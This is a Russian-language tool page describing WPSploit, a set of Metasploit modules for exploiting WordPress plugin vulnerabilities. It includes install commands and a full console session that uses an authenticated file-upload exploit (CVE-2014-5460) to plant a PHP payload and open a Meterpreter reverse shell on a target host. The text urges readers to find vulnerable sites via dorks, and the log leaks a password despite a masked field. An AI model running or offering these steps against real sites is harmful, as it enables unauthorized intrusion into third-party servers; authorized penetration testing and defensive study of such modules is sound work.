WPSploit


Описание WPSploit

WPSploit - это дополнительные модули для эксплуатации уязвимостей WordPress с помощью Metasploit.

Назначение этого репозитория — создание и/или портирование эксплойтов под WordPress, в качестве инструмента эксплуатации используется привычный многим Metasploit.

На данный момент имеется 39 модулей (14 эксплойтов и 25 вспомогательных, которые, как правило, проводят разнообразные сканирования/анализ имеющихся уязвимостей).

Все модули созданы с использованием информации базы данных уязвимостей WPScan. Нужно понимать, что главное отличие этих модулей от названной базы данных в том, что это не просто описания уязвимостей, а готовый эксплойты. Вам только нужно найти уязвимые сайты (по доркам или по собственным базам).

Домашняя страница: https://github.com/espreto/wpsploit

Справка по WPSploit

Документация по всем модулям расположена по этому адресу: https://github.com/espreto/wpsploit/tree/master/documentation. Обратите внимание на неё, поскольку в ней даны подробные описания каждого модуля, включающие имеющиеся уязвимости (полезно для поиска уязвимых сайтов), даны примеры использования.

Посмотреть на список модулей можете здесь: https://github.com/espreto/wpsploit/tree/master/modules

Руководство по WPSploit

Страница man отсутствует.

Примеры запуска WPSploit

Эксплойты из WPSploit можно использовать с помощью Metasploit. Т.е. нам нужно запустить Metasploit. Делается это так:

Далее показан пример работы с одним из эксплойтов:



msf > use exploit/unix/webapp/wp_slideshowgallery_upload 
msf exploit(wp_slideshowgallery_upload) > show options 

Module options (exploit/unix/webapp/wp_slideshowgallery_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       Valid password for the provided username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   USER                        yes       A valid username
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   WP SlideShow Gallery 1.4.6


msf exploit(wp_slideshowgallery_upload) > info

       Name: WordPress SlideShow Gallery Authenticated File Upload
     Module: exploit/unix/webapp/wp_slideshowgallery_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2014-08-28

Provided by:
  Jesus Ramirez Pichardo
  Roberto Soares Espreto

Available targets:
  Id  Name
  --  ----
  0   WP SlideShow Gallery 1.4.6

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    yes       Valid password for the provided username
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  USER                        yes       A valid username
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  The WordPress SlideShow Gallery plugin contains an auhtenticated 
  file upload vulnerability. We can upload arbitrary files to the 
  upload folder, because the plugin uses it's own file upload 
  mechanism instead of the wordpress api it's possible to upload any 
  file type. The user provided does not need special rights, and users 
  with "Contributor" role can be abused.

References:
  http://cvedetails.com/cve/2014-5460/
  http://www.exploit-db.com/exploits/34681/

msf exploit(wp_slideshowgallery_upload) > set RHOST 192.168.1.31
RHOST => 192.168.1.31
msf exploit(wp_slideshowgallery_upload) > set USER espreto
USER => espreto
msf exploit(wp_slideshowgallery_upload) > set PASSWORD xxxxxxx
PASSWORD => dvd43145
msf exploit(wp_slideshowgallery_upload) > exploit 

[*] Started reverse handler on 192.168.1.46:4444 
[*] 192.168.1.31:80 - Trying to login as espreto
[*] 192.168.1.31:80 - Trying to upload payload
[*] 192.168.1.31:80 - Uploading payload
[*] 192.168.1.31:80 - Calling uploaded file tfyteogt.php
[*] Sending stage (40499 bytes) to 192.168.1.31
[*] Meterpreter session 1 opened (192.168.1.46:4444 -> 192.168.1.31:40298) at 2015-04-13 03:46:36 -0300
[+] Deleted tfyteogt.php

meterpreter > sysinfo 
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686
Meterpreter : php/php
meterpreter >

Установка WPSploit

Установка в Kali Linux

Подразумевается, что Metasploit у вас уже установлен. Далее делаете так:

cd ~/.msf4/modules/
git clone https://github.com/espreto/wpsploit.git

Информация об установке в другие операционные системы будет добавлена позже.

Скриншоты WPSploit

Это утилита командной строки.

Инструкции по WPSploit

Ссылки на инструкции будут добавлены позже.


Близкие программы:

  • Metasploit (79.1%)
  • WPForce (74%)
  • Maltego (58.1%)
  • sqlmap (58.1%)
  • Social-Engineer Toolkit (SET) (57.4%)
  • PoisonTap (RANDOM - 36.5%)
  • Рекомендуется Вам:

    Comments are Closed